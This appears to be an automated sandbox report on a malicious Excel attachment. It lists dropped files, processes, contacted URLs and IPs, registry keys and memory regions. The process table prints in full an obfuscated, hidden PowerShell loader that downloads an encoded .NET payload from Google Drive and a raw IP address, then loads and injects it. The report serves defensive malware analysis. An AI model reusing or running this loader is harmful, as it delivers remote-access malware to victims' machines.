Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Comprobante de pago.xlam.xlsx
|
Microsoft Excel 2007+
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\WEDNESDAY-constraints[1].vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\wednesdaystuff.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\~$Comprobante de pago.xlam.xlsx
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\am4dwxca.1ew.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bfrds51d.000.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\m35xg52g.f2x.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ztogcjfq.tzz.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\Desktop\~$Comprobante de pago.xlam.xls
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
|
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient
= New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag
= TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex
= xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length
= x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed
= -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+'
= [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod
= [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6,
TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));')
-CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))"
|
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://192.3.216.142/WEDNESDAY-constraints.vbs
|
192.3.216.142
|
|
|
|
https://paste.ee/d/KXy1F
|
188.114.97.3
|
|
|
|
https://drive.google.
|
unknown
|
|
|
|
https://drive.google
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://192.3.216.142/WEDNESDAY-constraints.vbszzC:
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
http://paste.ee/d/KXy1FS
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
http://paste.ee/d/KXy1F
|
unknown
|
||
|
http://192.3.216.142/WEDNESDAY-constraints.vbsj
|
unknown
|
||
|
https://drive.usercontent.googleX
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
There are 25 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
drive.google.com
|
216.58.212.174
|
||
|
drive.usercontent.google.com
|
216.58.212.129
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.3.216.142
|
unknown
|
United States
|
|
|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
216.58.212.174
|
drive.google.com
|
United States
|
||
|
216.58.212.129
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
1g/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
$n/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
|
EquationEditorFilesIntl_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
|
EquationEditorFilesIntl_1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 23 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2BDC000
|
heap
|
page read and write
|
||
|
663000
|
heap
|
page read and write
|
||
|
521000
|
heap
|
page read and write
|
||
|
4ABE000
|
stack
|
page read and write | page guard
|
||
|
5003000
|
heap
|
page read and write
|
||
|
497000
|
heap
|
page read and write
|
||
|
232000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
927E000
|
stack
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
3B5D000
|
heap
|
page read and write
|
||
|
5CE000
|
heap
|
page read and write
|
||
|
261F000
|
stack
|
page read and write
|
||
|
3B47000
|
heap
|
page read and write
|
||
|
392F000
|
stack
|
page read and write
|
||
|
3A9000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
21B5000
|
trusted library allocation
|
page read and write
|
||
|
5E1F000
|
stack
|
page read and write
|
||
|
4360000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EBD000
|
stack
|
page read and write
|
||
|
2DC3000
|
heap
|
page read and write
|
||
|
4A2E000
|
stack
|
page read and write
|
||
|
26A000
|
trusted library allocation
|
page read and write
|
||
|
64B000
|
heap
|
page read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
606000
|
heap
|
page read and write
|
||
|
3066000
|
trusted library allocation
|
page read and write
|
||
|
326000
|
stack
|
page read and write
|
||
|
4E3D000
|
heap
|
page read and write
|
||
|
2474000
|
trusted library allocation
|
page read and write
|
||
|
4BB000
|
heap
|
page read and write
|
||
|
8F2F000
|
heap
|
page read and write
|
||
|
52EE000
|
stack
|
page read and write
|
||
|
4A8000
|
heap
|
page read and write
|
||
|
3EE0000
|
heap
|
page read and write
|
||
|
2D7000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B61000
|
heap
|
page read and write
|
||
|
3262000
|
trusted library allocation
|
page read and write
|
||
|
4410000
|
trusted library allocation
|
page read and write
|
||
|
58F000
|
heap
|
page read and write
|
||
|
32C000
|
stack
|
page read and write
|
||
|
3A0000
|
trusted library allocation
|
page read and write
|
||
|
3263000
|
trusted library allocation
|
page read and write
|
||
|
2CC000
|
stack
|
page read and write
|
||
|
42B6000
|
heap
|
page execute and read and write
|
||
|
5FE000
|
heap
|
page read and write
|
||
|
4B2F000
|
stack
|
page read and write
|
||
|
2F6D000
|
stack
|
page read and write
|
||
|
2BB8000
|
heap
|
page read and write
|
||
|
708000
|
heap
|
page read and write
|
||
|
200000
|
trusted library allocation
|
page read and write
|
||
|
45D000
|
heap
|
page read and write
|
||
|
2BBD000
|
heap
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
238A000
|
trusted library allocation
|
page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
1A7000
|
stack
|
page read and write
|
||
|
4F92000
|
heap
|
page read and write
|
||
|
4AA000
|
heap
|
page read and write
|
||
|
4FDC000
|
heap
|
page read and write
|
||
|
1D60000
|
heap
|
page read and write
|
||
|
4190000
|
trusted library allocation
|
page read and write
|
||
|
46D000
|
heap
|
page read and write
|
||
|
646000
|
heap
|
page read and write
|
||
|
2561000
|
trusted library allocation
|
page read and write
|
||
|
5036000
|
heap
|
page read and write
|
||
|
49E000
|
stack
|
page read and write
|
||
|
521000
|
heap
|
page read and write
|
||
|
8F1F000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
3220000
|
heap
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
4350000
|
trusted library allocation
|
page read and write
|
||
|
3561000
|
trusted library allocation
|
page read and write
|
||
|
3EE000
|
stack
|
page read and write
|
||
|
280000
|
heap
|
page read and write
|
||
|
63B000
|
heap
|
page read and write
|
||
|
157000
|
stack
|
page read and write
|
||
|
2BFE000
|
stack
|
page read and write
|
||
|
200D000
|
stack
|
page read and write
|
||
|
513F000
|
stack
|
page read and write
|
||
|
5E70000
|
heap
|
page read and write
|
||
|
287000
|
heap
|
page read and write
|
||
|
2833000
|
trusted library allocation
|
page read and write
|
||
|
29B000
|
stack
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
2DC9000
|
heap
|
page read and write
|
||
|
4DC000
|
stack
|
page read and write
|
||
|
3B3F000
|
heap
|
page read and write
|
||
|
2BCC000
|
heap
|
page read and write
|
||
|
95A0000
|
heap
|
page read and write
|
||
|
15B000
|
stack
|
page read and write
|
||
|
4A6E000
|
stack
|
page read and write
|
||
|
9880000
|
trusted library allocation
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
18A000
|
stack
|
page read and write
|
||
|
4BFE000
|
stack
|
page read and write
|
||
|
5BF000
|
heap
|
page read and write
|
||
|
1E88000
|
heap
|
page read and write
|
||
|
599000
|
heap
|
page read and write
|
||
|
4DD0000
|
heap
|
page read and write
|
||
|
392000
|
heap
|
page read and write
|
||
|
230000
|
trusted library allocation
|
page read and write
|
||
|
330000
|
trusted library allocation
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
426E000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
282F000
|
trusted library allocation
|
page read and write
|
||
|
5044000
|
heap
|
page read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
3589000
|
trusted library allocation
|
page read and write
|
||
|
204000
|
trusted library allocation
|
page read and write
|
||
|
9880000
|
trusted library allocation
|
page read and write
|
||
|
2020000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B5C000
|
heap
|
page read and write
|
||
|
46D000
|
heap
|
page read and write
|
||
|
660000
|
trusted library allocation
|
page read and write
|
||
|
5E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B36000
|
heap
|
page read and write
|
||
|
46FE000
|
stack
|
page read and write
|
||
|
49B000
|
heap
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
488000
|
heap
|
page read and write
|
||
|
606000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
2B3D000
|
heap
|
page read and write
|
||
|
582000
|
heap
|
page read and write
|
||
|
4B6E000
|
stack
|
page read and write
|
||
|
42A0000
|
trusted library allocation
|
page read and write
|
||
|
4FE0000
|
heap
|
page read and write
|
||
|
2A8000
|
trusted library allocation
|
page read and write
|
||
|
60C000
|
heap
|
page read and write
|
||
|
49B000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
27DD000
|
trusted library allocation
|
page read and write
|
||
|
250B000
|
stack
|
page read and write
|
||
|
307A000
|
trusted library allocation
|
page read and write
|
||
|
5410000
|
heap
|
page read and write
|
||
|
43C0000
|
trusted library allocation
|
page read and write
|
||
|
24B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
678000
|
heap
|
page read and write
|
||
|
5E6F000
|
stack
|
page read and write
|
||
|
4A0000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
1F10000
|
trusted library allocation
|
page read and write
|
||
|
2DBC000
|
trusted library allocation
|
page read and write
|
||
|
8F0D000
|
heap
|
page read and write
|
||
|
413F000
|
stack
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
2427000
|
trusted library allocation
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
5E6E000
|
stack
|
page read and write
|
||
|
204000
|
trusted library allocation
|
page read and write
|
||
|
20D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3A80000
|
heap
|
page read and write
|
||
|
62F0000
|
heap
|
page read and write
|
||
|
22A000
|
trusted library allocation
|
page execute and read and write
|
||
|
540000
|
trusted library allocation
|
page read and write
|
||
|
3B70000
|
heap
|
page read and write
|
||
|
61FE000
|
stack
|
page read and write
|
||
|
23C7000
|
trusted library allocation
|
page read and write
|
||
|
453000
|
trusted library allocation
|
page read and write
|
||
|
1DDE000
|
stack
|
page read and write
|
||
|
503000
|
heap
|
page read and write
|
||
|
4330000
|
trusted library allocation
|
page read and write
|
||
|
3083000
|
trusted library allocation
|
page read and write
|
||
|
9140000
|
heap
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
3045000
|
trusted library allocation
|
page read and write
|
||
|
4560000
|
trusted library allocation
|
page read and write
|
||
|
2F1C000
|
stack
|
page read and write
|
||
|
2A0000
|
trusted library allocation
|
page read and write
|
||
|
63D000
|
heap
|
page read and write
|
||
|
53AE000
|
stack
|
page read and write
|
||
|
29FF000
|
stack
|
page read and write
|
||
|
3B57000
|
heap
|
page read and write
|
||
|
28F2000
|
trusted library allocation
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
5066000
|
heap
|
page read and write
|
||
|
41A0000
|
trusted library allocation
|
page read and write
|
||
|
320000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCE000
|
stack
|
page read and write
|
||
|
90000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
640000
|
trusted library allocation
|
page read and write
|
||
|
3B48000
|
heap
|
page read and write
|
||
|
2131000
|
trusted library allocation
|
page read and write
|
||
|
4AA000
|
heap
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
3B64000
|
heap
|
page read and write
|
||
|
3B64000
|
heap
|
page read and write
|
||
|
370000
|
remote allocation
|
page read and write
|
||
|
5031000
|
heap
|
page read and write
|
||
|
1F5E000
|
stack
|
page read and write
|
||
|
2DFF000
|
heap
|
page read and write
|
||
|
4270000
|
trusted library allocation
|
page read and write
|
||
|
2173000
|
trusted library allocation
|
page read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
92D0000
|
heap
|
page read and write
|
||
|
950F000
|
stack
|
page read and write
|
||
|
459000
|
trusted library allocation
|
page read and write
|
||
|
1E02000
|
heap
|
page read and write
|
||
|
2B97000
|
heap
|
page read and write
|
||
|
2010000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
422E000
|
stack
|
page read and write
|
||
|
27F000
|
stack
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
5D4E000
|
stack
|
page read and write
|
||
|
1E60000
|
trusted library allocation
|
page read and write
|
||
|
432F000
|
stack
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
2393000
|
trusted library allocation
|
page read and write
|
||
|
1F30000
|
trusted library allocation
|
page read and write
|
||
|
2D0000
|
trusted library allocation
|
page read and write
|
||
|
96AF000
|
stack
|
page read and write
|
||
|
310000
|
trusted library allocation
|
page read and write
|
||
|
418D000
|
stack
|
page read and write
|
||
|
4AA000
|
heap
|
page read and write
|
||
|
9740000
|
heap
|
page read and write
|
||
|
4140000
|
trusted library allocation
|
page read and write
|
||
|
513E000
|
stack
|
page read and write | page guard
|
||
|
3B44000
|
heap
|
page read and write
|
||
|
450E000
|
stack
|
page read and write
|
||
|
4FA0000
|
heap
|
page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
497000
|
heap
|
page read and write
|
||
|
3D7E000
|
stack
|
page read and write
|
||
|
212F000
|
stack
|
page read and write
|
||
|
2B56000
|
heap
|
page read and write
|
||
|
21A000
|
trusted library allocation
|
page read and write
|
||
|
23B4000
|
trusted library allocation
|
page read and write
|
||
|
604F000
|
stack
|
page read and write
|
||
|
4FC0000
|
heap
|
page read and write
|
||
|
89000
|
stack
|
page read and write
|
||
|
1EFE000
|
stack
|
page read and write
|
||
|
2E000
|
heap
|
page read and write
|
||
|
374000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
2AFF000
|
stack
|
page read and write
|
||
|
2DD7000
|
heap
|
page read and write
|
||
|
2BB5000
|
heap
|
page read and write
|
||
|
2B3F000
|
heap
|
page read and write
|
||
|
2BD1000
|
heap
|
page read and write
|
||
|
62E000
|
stack
|
page read and write | page guard
|
||
|
2BD5000
|
heap
|
page read and write
|
||
|
5B6000
|
heap
|
page read and write
|
||
|
90EF000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
521000
|
heap
|
page read and write
|
||
|
457000
|
trusted library allocation
|
page read and write
|
||
|
1E50000
|
trusted library allocation
|
page read and write
|
||
|
27F2000
|
trusted library allocation
|
page read and write
|
||
|
250000
|
heap
|
page read and write
|
||
|
4E1E000
|
stack
|
page read and write
|
||
|
3B57000
|
heap
|
page read and write
|
||
|
2B8F000
|
heap
|
page read and write
|
||
|
2B94000
|
heap
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
308B000
|
trusted library allocation
|
page read and write
|
||
|
3050000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
1F60000
|
heap
|
page read and write
|
||
|
503000
|
heap
|
page read and write
|
||
|
521000
|
heap
|
page read and write
|
||
|
30CE000
|
stack
|
page read and write
|
||
|
3B6D000
|
heap
|
page read and write
|
||
|
3B5D000
|
heap
|
page read and write
|
||
|
3087000
|
trusted library allocation
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
28FA000
|
trusted library allocation
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
283F000
|
stack
|
page read and write
|
||
|
512000
|
heap
|
page read and write
|
||
|
1F70000
|
direct allocation
|
page read and write
|
||
|
23E7000
|
trusted library allocation
|
page read and write
|
||
|
4AC000
|
heap
|
page read and write
|
||
|
2FB1000
|
heap
|
page read and write
|
||
|
459B000
|
stack
|
page read and write
|
||
|
4B1B000
|
stack
|
page read and write
|
||
|
370000
|
remote allocation
|
page read and write
|
||
|
4BAE000
|
stack
|
